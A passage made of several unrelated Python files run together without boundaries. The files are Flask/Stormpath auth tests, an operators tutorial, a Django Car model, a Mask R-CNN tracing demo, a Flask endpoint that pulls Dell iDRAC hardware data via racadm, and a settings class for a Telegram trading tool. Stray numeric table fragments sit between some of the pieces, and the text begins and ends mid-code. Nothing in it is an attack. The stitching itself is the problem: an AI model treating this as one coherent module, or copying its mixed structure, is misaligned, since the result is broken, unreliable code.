        with self.app.test_client() as c:
            # Ensure that an error is raised if an invalid password is
            # specified.
            resp = c.post('/register', data={
                'given_name': 'Randall',
                'surname': 'Degges',
                'email': 'r@rdegges.com',
                'password': 'hilol',
            })
            self.assertEqual(resp.status_code, 200)
            self.assertTrue('Account password minimum length not satisfied.' in resp.data.decode('utf-8'))
            # The raw API 'developerMessage' must never leak to the user.
            self.assertFalse('developerMessage' in resp.data.decode('utf-8'))

            resp = c.post('/register', data={
                'given_name': 'Randall',
                'surname': 'Degges',
                'email': 'r@rdegges.com',
                'password': 'hilolwoot1',
            })
            self.assertEqual(resp.status_code, 200)
            self.assertTrue('Password requires at least 1 uppercase character.' in resp.data.decode('utf-8'))
            self.assertFalse('developerMessage' in resp.data.decode('utf-8'))

            resp = c.post('/register', data={
                'given_name': 'Randall',
                'surname': 'Degges',
                'email': 'r@rdegges.com',
                'password': 'hilolwoothi',
            })
            self.assertEqual(resp.status_code, 200)
            self.assertTrue('Password requires at least 1 numeric character.' in resp.data.decode('utf-8'))
            self.assertFalse('developerMessage' in resp.data.decode('utf-8'))

    def test_redirect_to_login_and_register_url(self):
        """Registration honors the shared STORMPATH_REDIRECT_URL."""
        # Setting redirect URL to something that is easy to check
        stormpath_redirect_url = '/redirect_for_login_and_registration'
        self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url

        with self.app.test_client() as c:
            # Ensure that valid registration will redirect to
            # STORMPATH_REDIRECT_URL
            resp = c.post(
                '/register',
                data={
                    'given_name': 'Randall',
                    'middle_name': 'Clark',
                    'surname': 'Degges',
                    'email': 'r@rdegges.com',
                    'password': 'woot1LoveCookies!',
                })
            self.assertEqual(resp.status_code, 302)
            location = resp.headers.get('location')
            self.assertTrue(stormpath_redirect_url in location)

    def test_redirect_to_register_url(self):
        """A registration-specific redirect URL overrides the shared one."""
        # Setting redirect URLs to something that is easy to check
        stormpath_redirect_url = '/redirect_for_login'
        stormpath_registration_redirect_url = '/redirect_for_registration'
        self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url
        self.app.config['STORMPATH_REGISTRATION_REDIRECT_URL'] = \
            stormpath_registration_redirect_url

        with self.app.test_client() as c:
            # Ensure that valid registration will redirect to
            # STORMPATH_REGISTRATION_REDIRECT_URL if it exists
            resp = c.post(
                '/register',
                data={
                    'given_name': 'Randall',
                    'middle_name': 'Clark',
                    'surname': 'Degges',
                    'email': 'r@rdegges.com',
                    'password': 'woot1LoveCookies!',
                })
            self.assertEqual(resp.status_code, 302)
            location = resp.headers.get('location')
            self.assertFalse(stormpath_redirect_url in location)
            self.assertTrue(stormpath_registration_redirect_url in location)
class TestLogin(StormpathTestCase):
    """Test our login view.

    As with registration: 200 means the form re-rendered with errors,
    302 means a successful login redirect.
    """

    def test_email_login(self):
        """Users can log in with email + password."""
        # Create a user.
        with self.app.app_context():
            User.create(
                given_name = 'Randall',
                surname = 'Degges',
                email = 'r@rdegges.com',
                password = 'woot1LoveCookies!',
            )

        # Attempt a login using email and password.
        with self.app.test_client() as c:
            resp = c.post('/login', data={
                'login': 'r@rdegges.com',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(resp.status_code, 302)

    def test_username_login(self):
        """Users can log in with username + password."""
        # Create a user.
        with self.app.app_context():
            User.create(
                username = 'rdegges',
                given_name = 'Randall',
                surname = 'Degges',
                email = 'r@rdegges.com',
                password = 'woot1LoveCookies!',
            )

        # Attempt a login using username and password.
        with self.app.test_client() as c:
            resp = c.post('/login', data={
                'login': 'rdegges',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(resp.status_code, 302)

    def test_error_messages(self):
        """A bad password yields a user-facing error, not the API payload."""
        # Create a user.
        with self.app.app_context():
            User.create(
                username = 'rdegges',
                given_name = 'Randall',
                surname = 'Degges',
                email = 'r@rdegges.com',
                password = 'woot1LoveCookies!',
            )

        # Ensure that an error is raised if an invalid username or password is
        # specified.
        with self.app.test_client() as c:
            resp = c.post('/login', data={
                'login': 'rdegges',
                'password': 'hilol',
            })
            self.assertEqual(resp.status_code, 200)

            #self.assertTrue('Invalid username or password.' in resp.data.decode('utf-8'))
            self.assertTrue('Login attempt failed because the specified password is incorrect.' in resp.data.decode('utf-8'))
            # The raw API 'developerMessage' must never leak to the user.
            self.assertFalse('developerMessage' in resp.data.decode('utf-8'))

    def test_redirect_to_login_and_register_url(self):
        """Login honors the shared STORMPATH_REDIRECT_URL."""
        # Create a user.
        with self.app.app_context():
            User.create(
                username = 'rdegges',
                given_name = 'Randall',
                surname = 'Degges',
                email = 'r@rdegges.com',
                password = 'woot1LoveCookies!',
            )

        # Setting redirect URL to something that is easy to check
        stormpath_redirect_url = '/redirect_for_login_and_registration'
        self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url

        with self.app.test_client() as c:
            # Attempt a login using username and password.
            resp = c.post(
                '/login',
                data={'login': 'rdegges', 'password': 'woot1LoveCookies!',})
            self.assertEqual(resp.status_code, 302)
            location = resp.headers.get('location')
            self.assertTrue(stormpath_redirect_url in location)

    def test_redirect_to_register_url(self):
        """The registration-specific redirect URL must NOT apply to login."""
        # Create a user.
        with self.app.app_context():
            User.create(
                username = 'rdegges',
                given_name = 'Randall',
                surname = 'Degges',
                email = 'r@rdegges.com',
                password = 'woot1LoveCookies!',
            )

        # Setting redirect URLs to something that is easy to check
        stormpath_redirect_url = '/redirect_for_login'
        stormpath_registration_redirect_url = '/redirect_for_registration'
        self.app.config['STORMPATH_REDIRECT_URL'] = stormpath_redirect_url
        self.app.config['STORMPATH_REGISTRATION_REDIRECT_URL'] = \
            stormpath_registration_redirect_url

        with self.app.test_client() as c:
            # Attempt a login using username and password.
            resp = c.post(
                '/login',
                data={'login': 'rdegges', 'password': 'woot1LoveCookies!',})
            self.assertEqual(resp.status_code, 302)
            location = resp.headers.get('location')
            self.assertTrue('redirect_for_login' in location)
            self.assertFalse('redirect_for_registration' in location)
class TestLogout(StormpathTestCase):
    """Exercise the logout view for anonymous and authenticated users."""

    def test_logout_works_with_anonymous_users(self):
        """Hitting /logout without a session still redirects cleanly."""
        with self.app.test_client() as client:
            response = client.get('/logout')
            self.assertEqual(response.status_code, 302)

    def test_logout_works(self):
        """A logged-in user can log out and is redirected."""
        # Provision the account we'll authenticate as.
        with self.app.app_context():
            User.create(
                given_name = 'Randall',
                surname = 'Degges',
                email = 'r@rdegges.com',
                password = 'woot1LoveCookies!',
            )

        with self.app.test_client() as client:
            # Establish a session by logging in first.
            login_response = client.post('/login', data={
                'login': 'r@rdegges.com',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(login_response.status_code, 302)

            # Now log back out; this should also redirect.
            self.assertEqual(client.get('/logout').status_code, 302)
| 12,142 | 3,517 |
# Demonstration of Python's basic operators, using x and y as operands.
x = 9
y = 3

# Arithmetic Operators
print(x+y) #addition
print(x-y) #subtraction
print(x*y) #multiplication
print(x/y) #division
print(x%y) #modulus provides remainder after we do long division
print(x**y) #Exponentiation

x = 9.191823
print("Floor divide:", x//y) #Floor division, how many times does a number evenly divide
print("Modulo: ", x%y)

# Assignment operators
x = 9 # set x = 9
x += 3 # x = x + 3
print(x)
x = 9
x -= 3 # x = x - 3
print(x)
x *= 3 # x = x * 3
print(x)
x /= 3 # x = x / 3
print(x)
x **= 3 # x = x ** 3
print(x)

# Comparison operators
x = 9
y = 3
print("Does x==y?", x==y) #True if x equals y, False otherwise
print("Does x!=y?", x!=y) #True if x does not equal y, False otherwise
print("Is x>y?", x>y) #True if x is greater than y, False otherwise
print("Is x<y?", x<y) #True if x is less than y, False otherwise
print("Is x>=y?", x>=y) #True if x is greater than or equal to y, False otherwise
print("Is x<=y?", x<=y) #True if x is less than or equal to y, False otherwise
from django.db import models
# Create your models here.
class Car(models.Model):
    """A car registered in the system, addressable by network hostname."""

    # Display name of the car.
    car_name = models.CharField(max_length=50)
    # Network hostname used to reach the car.
    car_hostname = models.CharField(max_length=50)
    # Free-form state label.  NOTE(review): presumably a status such as
    # 'online'/'offline' — confirm against the views that set it.
    car_state = models.CharField(max_length=50)

    def __str__(self):
        return self.car_name

    def get_hostname(self):
        """Return the car's network hostname."""
        return self.car_hostname

    def get_state(self):
        """Return the car's state string."""
        return self.car_state
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import argparse
import cv2
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import torch
import time
from PIL import Image
import numpy
from matplotlib import pyplot
def combine_masks_tuple(input_model):
    # type: (Tuple[Tensor, Tensor, Tensor, Tensor, Tensor,Tensor]) -> Tensor
    """Overlay every instance mask onto the image, colored per label."""
    image_with_mask, bboxes, labels, masks, scores, palette = input_model
    # Rendering parameters are fixed for this demo path.
    threshold = 0.5
    padding = 1
    contour = True
    rectangle = False
    height = 800
    width = 800
    num_instances = masks.size(0)
    for idx in range(num_instances):
        # Deterministic per-label color derived from the palette.
        color = ((palette * labels[idx]) % 255).to(torch.uint8)
        pasted = my_paste_mask(masks[idx, 0], bboxes[idx], height, width,
                               threshold, padding, contour, rectangle)
        # Paint the mask's pixels with the label color, keep the rest.
        image_with_mask = torch.where(pasted.unsqueeze(-1),
                                      color.unsqueeze(0).unsqueeze(0),
                                      image_with_mask)
    return image_with_mask
def processImage(name, size, model):
    """Load image *name*, resize to (size, size), and return a normalized
    1x3xHxW float tensor on the model's device."""
    pil_image = Image.open(name).convert("RGB")
    pil_image = pil_image.resize((size, size), Image.BILINEAR)
    # [2, 1, 0] reorders the channel axis: RGB -> BGR (Caffe2-style input).
    image = torch.from_numpy(numpy.array(pil_image)[:, :, [2, 1, 0]])
    # HWC -> CHW, then subtract the configured per-channel pixel mean.
    image = (image.float()).permute(2, 0, 1) - torch.tensor(cfg.INPUT.PIXEL_MEAN)[:, None, None]
    # Add a batch dimension and move to the model's device.
    ImageFinal = image.unsqueeze(0).to(model.device)
    return ImageFinal
def processImageCPU(name, size, model):
    """Load image *name*, resize to (size, size), and return an HxWx3
    uint8 tensor in BGR channel order (kept on CPU; *model* is unused)."""
    resized = Image.open(name).convert("RGB").resize((size, size), Image.BILINEAR)
    # [2, 1, 0] flips the channel axis from RGB to BGR.
    bgr_array = numpy.array(resized)[:, :, [2, 1, 0]]
    return torch.from_numpy(bgr_array)
def my_paste_mask(mask, bbox, height, width, threshold=0.5, padding=1, contour=False, rectangle=False):
    # type: (Tensor, Tensor, int, int, float, int, bool, bool) -> Tensor
    """Paste a fixed-size instance mask into a (height, width) canvas at *bbox*.

    Returns a mask over the full canvas; optionally reduced to its contour
    and/or combined with the bbox rectangle outline.
    """
    # Pad the mask by one pixel per side so thresholding behaves at borders.
    padded_mask = torch.constant_pad_nd(mask, (padding, padding, padding, padding))
    #print("mask.size(-1)",mask.size(-1))
    # Grow the box by the same relative amount the padding grew the mask.
    scale = 1.0 + 2.0 * float(padding) / float(mask.size(-1))
    #print("scale",scale)
    center_x = (bbox[2] + bbox[0]) * 0.5
    center_y = (bbox[3] + bbox[1]) * 0.5
    w_2 = (bbox[2] - bbox[0]) * 0.5 * scale
    h_2 = (bbox[3] - bbox[1]) * 0.5 * scale # should have two scales?
    bbox_scaled = torch.stack([center_x - w_2, center_y - h_2,
                               center_x + w_2, center_y + h_2], 0)
    TO_REMOVE = 1
    w = (bbox_scaled[2] - bbox_scaled[0] + TO_REMOVE).clamp(min=1).long()
    h = (bbox_scaled[3] - bbox_scaled[1] + TO_REMOVE).clamp(min=1).long()

    # Resize the padded mask to the box size with the project's custom op.
    scaled_mask = torch.ops.maskrcnn_benchmark.upsample_bilinear(padded_mask.float(), h, w)

    x0 = bbox_scaled[0].long()
    y0 = bbox_scaled[1].long()
    x = x0.clamp(min=0)
    y = y0.clamp(min=0)
    #print("scaled_mask",scaled_mask.size())
    # Amounts clipped off the left/top when the box extends past the image.
    leftcrop = x - x0
    topcrop = y - y0
    w = torch.min(w - leftcrop, width - x)
    h = torch.min(h - topcrop, height - y)

    #mask = torch.zeros((height, width), dtype=torch.uint8)
    #mask[y:y + h, x:x + w] = (scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold)
    # Threshold the cropped region and pad back out to the full canvas.
    mask = torch.constant_pad_nd((scaled_mask[topcrop:topcrop + h, leftcrop:leftcrop + w] > threshold),
                                 (int(x), int(width - x - w), int(y), int(height - y - h))) # int for the script compiler
    if contour:
        mask = mask.float()
        # poor person's contour finding by comparing to smoothed
        mask = (mask - torch.nn.functional.conv2d(mask.unsqueeze(0).unsqueeze(0),
                torch.full((1, 1, 3, 3), 1.0 / 9.0), padding=1)[0, 0]).abs() > 0.001
    if rectangle:
        x = torch.arange(width, dtype=torch.long).unsqueeze(0)
        y = torch.arange(height, dtype=torch.long).unsqueeze(1)
        r = bbox.long()
        # work around script not liking bitwise ops
        rectangle_mask = ((((x == r[0]) + (x == r[2])) * (y >= r[1]) * (y <= r[3]))
                          + (((y == r[1]) + (y == r[3])) * (x >= r[0]) * (x <= r[2])))
        mask = (mask + rectangle_mask).clamp(max=1)
    #print(mask.size())
    return mask
def main():
    """Trace the Mask R-CNN demo model with TorchScript and visualize results.

    Parses config/CLI options, traces ``single_image_to_top_predictions`` on
    one image, saves and reloads the traced module, then runs it on two test
    images and shows the combined masks with matplotlib.
    """
    parser = argparse.ArgumentParser(description="PyTorch Object Detection Webcam Demo")
    parser.add_argument(
        "--config-file",
        default="../configs/caffe2/e2e_mask_rcnn_R_50_FPN_1x_caffe2.yaml",
        metavar="FILE",
        help="path to config file",
    )
    parser.add_argument(
        "--confidence-threshold",
        type=float,
        default=0.7,
        help="Minimum score for the prediction to be shown",
    )
    parser.add_argument(
        "--min-image-size",
        type=int,
        default=224,
        help="Smallest size of the image to feed to the model. "
             "Model was trained with 800, which gives best results",
    )
    parser.add_argument(
        "--show-mask-heatmaps",
        dest="show_mask_heatmaps",
        help="Show a heatmap probability for the top masks-per-dim masks",
        action="store_true",
    )
    parser.add_argument(
        "--masks-per-dim",
        type=int,
        default=2,
        help="Number of heatmaps per dimension to show",
    )
    parser.add_argument(
        "opts",
        help="Modify model config options using the command-line",
        default=None,
        nargs=argparse.REMAINDER,
    )
    args = parser.parse_args()
    # load config from file and command-line arguments
    cfg.merge_from_file(args.config_file)
    cfg.merge_from_list(args.opts)
    cfg.freeze()
    # prepare object that handles inference plus adds predictions on top of image
    coco_demo = COCODemo(
        cfg,
        confidence_threshold=args.confidence_threshold,
        show_mask_heatmaps=args.show_mask_heatmaps,
        masks_per_dim=args.masks_per_dim,
        min_image_size=args.min_image_size,
    )
    start_time = time.time()  # NOTE(review): start_time is never read afterwards
    image = processImage("test.jpg",800,coco_demo)
    image2 = processImageCPU("test.jpg",800,coco_demo)
    # Warm-up / sanity run before tracing.
    coco_demo.single_image_to_top_predictions(image)
    # Freeze parameters and switch to eval mode so tracing captures pure inference.
    for p in coco_demo.model.parameters():
        p.requires_grad_(False)
    coco_demo.model = coco_demo.model.eval()
    with torch.jit.optimized_execution(False):
        traced_model = torch.jit.trace(coco_demo.single_image_to_top_predictions, image, check_trace=False)
    traced_model.save('traced.pt')
    print("done tracing")
    print("testing first image:")
    # Round-trip through disk to verify the serialized module still works.
    loaded = torch.jit.load("traced.pt")
    boxes, labels, masks, scores = loaded(image)
    # Palette used to derive a per-label display color in combine_masks_tuple.
    palette=torch.tensor([3, 32767, 2097151])
    input_model=image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
    result_image1 = combine_masks_tuple(input_model)
    # Channels are BGR; flip back to RGB for matplotlib display.
    pyplot.imshow(result_image1[:, :, [2, 1, 0]])
    pyplot.show()
    print("testing second image:")
    image = processImage("test2.jpg",800,coco_demo)
    image2 = processImageCPU("test2.jpg",800,coco_demo)
    boxes, labels, masks, scores = loaded(image)
    palette=torch.tensor([3, 32767, 2097151])
    input_model=image2.cpu().squeeze(0), boxes.to(coco_demo.cpu_device), labels.to(coco_demo.cpu_device), masks.to(coco_demo.cpu_device), scores.to(coco_demo.cpu_device), palette
    result_image1 = combine_masks_tuple(input_model)
    pyplot.imshow(result_image1[:, :, [2, 1, 0]])
    pyplot.show()
# Script entry point.
if __name__ == "__main__":
    main()
| 7,340 | 2,774 |
#coding:utf-8
from flask import request,render_template, redirect,session
from . import app
from dbutil import DB
from collections import OrderedDict
import json
import datetime
# 基础
from dell_racadm import check_client_ip,check_dell_racadm_ip,dell_racadm_achieve_ip_info,achieve_dell_cacadm_comman,check_dell_racadm_info
# 数据信息
# 硬盘信息
from dell_racadm import check_dell_racadm_Physical_disk_format,achieve_disk_reportsclass_table_value,check_dell_racadm_Physical_disk_save
# 系统信息格式化 + 信息/网卡信息入库
from dell_racadm import check_dell_racadm_System_format,check_dell_racadm_System_Nic_info_save
# NIC网卡信息格式化
from dell_racadm import check_dell_racadm_NIC_CARD_format
# CPU信息
from dell_racadm import check_dell_racadm_cpu_info_format,check_dell_racadm_CPU_info_save
# 内存信息
from dell_racadm import check_dell_racadm_memory_info_format,check_dell_racadm_memory_info_save
# 前面板信息
from dell_racadm import check_dell_racadm_System_LCD_CurrentDisplay_save
# 传感器 状态 信息
# 传感器-内存
from dell_racadm import check_dell_racadm_Sensor_memory_format,check_dell_racadm_Sensor_memory_save
# 传感器-风扇
from dell_racadm import check_dell_racadm_Sensor_FAN_format,check_dell_racadm_Sensor_Fan_save
# 传感器-CPU
from dell_racadm import check_dell_racadm_Sensor_CPU_format,check_dell_racadm_Sensor_CPU_save
# 传感器-温度
from dell_racadm import check_dell_racadm_Sensor_TEMPERATURE_format,check_dell_racadm_Sensor_TEMPERATURE_save
# 传感器-电源
from dell_racadm import check_dell_racadm_Sensor_POWER_format,check_dell_racadm_Sensor_POWER_save
# 传感器-电池
from dell_racadm import check_dell_racadm_Sensor_BATTERY_format,check_dell_racadm_Sensor_BATTERY_save
# This endpoint receives an IP address to check and stores the results. No rate limit yet;
# testing suggests limiting to 300 requests, with 500 as the warning threshold.
# The limit can be enforced on the caller's side of this interface.
@app.route('/dell_racadm', methods=["GET"])
def dell_racadm():
    """Collect hardware and sensor info from a Dell iDRAC via racadm and store it.

    Returns short status-code strings: '01' when the client is not whitelisted,
    '1'..'10' for the specific failure points documented inline, 'ok' on success.
    """
    if request.method == "GET":
        client_ip = request.remote_addr
        if check_client_ip(client_ip) == 'no':
            # Client IP is not on the whitelist; deny access.
            return '01'
        IP_addr=request.args.get("IP_addr")
        check_ip_Result=check_dell_racadm_ip(client_ip,IP_addr)
        if check_ip_Result == 'no':
            # Return '1': the IP address is not on record.
            return '1'
        achieve_ip_Result=dell_racadm_achieve_ip_info(client_ip,IP_addr)
        if achieve_ip_Result == 'no':
            # Return '2': failed to fetch stored info for this IP address.
            return '2'
        check_time=datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # First verify that racadm itself is usable.
        tmp_0 = achieve_dell_cacadm_comman('test_connect')
        if tmp_0 == 'no':
            # Return '3': could not obtain the test racadm command.
            return '3'
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 == 'no' :
            # Return '4': racadm connection error.
            return '4'
        # Fetch physical-disk information and store it (best effort, no error return).
        tmp_0 = achieve_dell_cacadm_comman('achieve_disk')
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 != 'no':
            tmp_2=check_dell_racadm_Physical_disk_format(tmp_1,IP_addr,check_time)
            if tmp_2 != 'no':
                need_state = achieve_disk_reportsclass_table_value('save_status_data_need')
                tmp_3=check_dell_racadm_Physical_disk_save(IP_addr,achieve_ip_Result['id'],check_time,tmp_1,tmp_2,need_state)
        # Fetch server model, service tag, express service code, OS, power state,
        # NIC info, etc. and store them.
        tmp_0 = achieve_dell_cacadm_comman('achieve_NIC_and_System')
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 == 'no':
            return '5'
        # Format server model / service tag / express service code / OS / power state.
        need_state = achieve_disk_reportsclass_table_value('System_Information')
        tmp_3=check_dell_racadm_System_format(tmp_1,IP_addr,check_time,need_state)
        # Format NIC information.
        tmp_4=check_dell_racadm_NIC_CARD_format(tmp_1,IP_addr,check_time)
        # Persist system + NIC info to the database.
        tmp_5=check_dell_racadm_System_Nic_info_save(achieve_ip_Result['id'],System_data=tmp_3,Nic_data=tmp_4)
        # Memory hardware info: fetch, format, store.
        tmp_0 = achieve_dell_cacadm_comman('achieve_Memory_info')
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 == 'no':
            return '6'
        tmp_2=check_dell_racadm_memory_info_format(tmp_1,IP_addr,check_time,achieve_ip_Result['id'])
        if tmp_2 == 'no':
            return '7'
        tmp_3=check_dell_racadm_memory_info_save(achieve_ip_Result['id'],tmp_2)
        # CPU hardware info: fetch, format, store.
        tmp_0 = achieve_dell_cacadm_comman('achieve_CPU_info')
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 == 'no':
            return '8'
        tmp_2 = check_dell_racadm_cpu_info_format(tmp_1,IP_addr,check_time,achieve_ip_Result['id'])
        if tmp_2 == 'no':
            return '9'
        tmp_3 = check_dell_racadm_CPU_info_save(achieve_ip_Result['id'],tmp_2)
        # Front-panel (LCD) display info (best effort, no error return).
        tmp_0 = achieve_dell_cacadm_comman('achieve_System_LCD')
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 != 'no':
            check_dell_racadm_System_LCD_CurrentDisplay_save(achieve_ip_Result['id'],tmp_1)
        # Sensor status info: CPU, memory, temperature, fans, disks, motherboard, etc.
        tmp_0 = achieve_dell_cacadm_comman('achieve_sensorinfo')
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 == 'no':
            return '10'
        # Memory sensor: format and store.
        tmp_2=check_dell_racadm_Sensor_memory_format(tmp_1,check_time,achieve_ip_Result['id'])
        if tmp_2 != 'no':
            check_dell_racadm_Sensor_memory_save(achieve_ip_Result['id'],tmp_2)
        # Fan sensor: format and store.
        tmp_2=check_dell_racadm_Sensor_FAN_format(tmp_1,check_time,achieve_ip_Result['id'])
        if tmp_2 != 'no':
            check_dell_racadm_Sensor_Fan_save(achieve_ip_Result['id'],tmp_2)
        # CPU sensor: format and store.
        tmp_2=check_dell_racadm_Sensor_CPU_format(tmp_1,check_time,achieve_ip_Result['id'])
        if tmp_2 != 'no':
            check_dell_racadm_Sensor_CPU_save(achieve_ip_Result['id'],tmp_2)
        # Temperature sensor: format and store.
        tmp_2=check_dell_racadm_Sensor_TEMPERATURE_format(tmp_1,check_time,achieve_ip_Result['id'])
        if tmp_2 != 'no':
            check_dell_racadm_Sensor_TEMPERATURE_save(achieve_ip_Result['id'],tmp_2)
        # Power-supply sensor: format and store.
        tmp_2=check_dell_racadm_Sensor_POWER_format(tmp_1,check_time,achieve_ip_Result['id'])
        if tmp_2 != 'no':
            check_dell_racadm_Sensor_POWER_save(achieve_ip_Result['id'],tmp_2)
        # Battery sensor: format and store.
        tmp_2=check_dell_racadm_Sensor_BATTERY_format(tmp_1,check_time,achieve_ip_Result['id'])
        if tmp_2 != 'no':
            check_dell_racadm_Sensor_BATTERY_save(achieve_ip_Result['id'],tmp_2)
        return 'ok'
        # return json.dumps(tmp_2, ensure_ascii=False)
    else:
        return redirect('/')
# Store sensor-type info: CPU, memory, temperature, fans, disks, motherboard, etc.
@app.route('/save_cpu', methods=["GET"])
def save_cpu():
    """Refresh system/NIC info for a given iDRAC IP and return it as JSON.

    Returns short status codes '01'/'1'/'2'/'3'/'4' on the failure paths.
    """
    if request.method == "GET":
        client_ip = request.remote_addr
        if check_client_ip(client_ip) == 'no':
            # Client IP is not on the whitelist; deny access.
            return '01'
        IP_addr=request.args.get("IP_addr")
        check_ip_Result=check_dell_racadm_ip(client_ip,IP_addr)
        if check_ip_Result == 'no':
            # Return '1': the IP address is not on record.
            return '1'
        achieve_ip_Result=dell_racadm_achieve_ip_info(client_ip,IP_addr)
        if achieve_ip_Result == 'no':
            # Return '2': failed to fetch stored info for this IP address.
            return '2'
        # Refresh NIC/system info.
        tmp_0 = achieve_dell_cacadm_comman('achieve_NIC_and_System')
        if tmp_0 == 'no':
            # NOTE(review): this '3' (command lookup failed) is indistinguishable
            # for callers from the '3' below (racadm connection error).
            return '3'
        tmp_1 = check_dell_racadm_info(IP_addr,achieve_ip_Result['card_user_name'],achieve_ip_Result['card_user_passwd'],tmp_0)
        if tmp_1 == 'no':
            # Return '3': racadm connection error.
            return '3'
        check_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        need_state = achieve_disk_reportsclass_table_value('System_Information')
        tmp_2=check_dell_racadm_System_format(tmp_1,IP_addr,check_time,need_state)
        # NOTE(review): this return makes everything below unreachable — it looks
        # like a leftover debugging short-circuit; confirm whether the NIC
        # formatting below was meant to run instead.
        return json.dumps(tmp_2, ensure_ascii=False)
        tmp_2 = check_dell_racadm_NIC_CARD_format(tmp_1,IP_addr,check_time)
        if tmp_2 == 'no':
            # Return '4': data formatting failed (pattern did not match).
            return '4'
        else:
            return json.dumps(tmp_2, ensure_ascii=False)
        return tmp_2
    return '33'
| 8,736 | 3,904 |
import os
from configparser import NoOptionError, NoSectionError, RawConfigParser

import constants
import utils
class Config(RawConfigParser):
    """INI-file backed application settings.

    Creates ``setting.ini`` populated with defaults on first run and persists
    every mutation through :meth:`save`.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Section header names used throughout the app.
        self.disclaimer_section_header = "disclaimer"
        self.telegram_section_header = "telegram"
        self.telegram_dialog_section_header = "telegram_dialog_setting"
        self.trade_account_section_header = "trade_account_setting"
        self.trade_section_header = "trade_setting"
        # Per-dialog sections are named "telegram_dialog_<dialog_id>".
        self.telegram_dialog_setting_prefix = "telegram_dialog_"
        self.file_path = utils.get_dir_path_by_platform() + "setting.ini"
        self.create_setting_file_when_not_exists()
        self.read(self.file_path)

    def create_setting_file_when_not_exists(self):
        """Write a settings file populated with defaults if none exists yet."""
        if not os.path.exists(self.file_path):
            self[self.disclaimer_section_header] = {
                'disclaimer_version': 'LOCAL',
                'understand_and_agree': 'N'
            }
            self[self.telegram_section_header] = {
                'api_id': '',
                'api_hash': '',
                'phone_number': ''
            }
            self[self.telegram_dialog_section_header] = {
                'default_dialog_id': ''
            }
            self[self.trade_account_section_header] = {
                'port': 11111
            }
            self[self.trade_section_header] = {
                'trade_mode': constants.TradeMode.FIXED_QUANTITY,
                'trade_product_hsi': 'Y',
                'trade_product_mhi': 'N',
                'hsi_trade_quantity': 1,
                'mhi_trade_quantity': 1,
                'hsi_margin': 150000,
                'mhi_margin': 30000,
                'trade_period_morning': 'Y',
                'trade_period_afternoon': 'Y',
                'trade_period_night': 'Y',
                'open_extra_price': 0,
                'close_price_adjust_interval': 1,
                'cancel_unfulfilled_order_after_second': 10,
                'trade_only_within_second': 3,
                'manual_confirm_trade_message': 'Y'
            }
            self.save()

    def get(self, section, code):
        """Return the stored value, creating an empty entry for a missing option.

        A missing *section* still propagates ``NoSectionError`` — callers such
        as :meth:`get_telegram_dialog_setting` rely on that to detect an
        unconfigured dialog. (Previously a bare ``except:`` hid the real
        exception type and ``set`` re-raised ``NoSectionError`` anyway.)
        """
        try:
            return super().get(section, code)
        except NoOptionError:
            self.set(section, code, "")
            self.save()
            return ""

    def save(self):
        """Persist the current settings to disk.

        Uses a context manager so the file handle is closed; the previous
        ``self.write(open(self.file_path, 'w'))`` leaked the handle.
        """
        with open(self.file_path, 'w') as setting_file:
            self.write(setting_file)

    def get_disclaimer_version(self):
        """Return the accepted disclaimer version string."""
        return self.get(self.disclaimer_section_header, "disclaimer_version")

    def save_disclaimer_version(self, value):
        """Store and persist the disclaimer version."""
        self.set(self.disclaimer_section_header, "disclaimer_version", value)
        self.save()

    def get_disclaimer_understand_and_agree(self):
        """Return the 'Y'/'N' disclaimer-acceptance flag."""
        return self.get(self.disclaimer_section_header, "understand_and_agree")

    def save_disclaimer_understand_and_agree(self, value):
        """Store and persist the disclaimer-acceptance flag."""
        self.set(self.disclaimer_section_header, "understand_and_agree", value)
        self.save()

    def save_telegram_dialog_setting(self, dialog_id, open_buy_template, close_buy_template, open_sell_template,
                                     close_sell_template, time_format):
        """Replace the whole per-dialog section for ``dialog_id``.

        NOTE(review): unlike the other setters this does not call ``save()``;
        confirm that callers persist explicitly.
        """
        self[self.telegram_dialog_setting_prefix + str(dialog_id)] = {
            'open_buy_template': open_buy_template,
            'close_buy_template': close_buy_template,
            'open_sell_template': open_sell_template,
            'close_sell_template': close_sell_template,
            'time_format': time_format
        }

    def get_telegram_dialog_setting(self, dialog_id):
        """Return the per-dialog template dict, or None when the dialog has no section."""
        try:
            section_header = self.telegram_dialog_setting_prefix + str(dialog_id)
            open_buy_template = self.get(section_header, 'open_buy_template')
            close_buy_template = self.get(section_header, 'close_buy_template')
            open_sell_template = self.get(section_header, 'open_sell_template')
            close_sell_template = self.get(section_header, 'close_sell_template')
            time_format = self.get(section_header, 'time_format')
            return {
                'open_buy_template': open_buy_template,
                'close_buy_template': close_buy_template,
                'open_sell_template': open_sell_template,
                'close_sell_template': close_sell_template,
                'time_format': time_format
            }
        except NoSectionError:
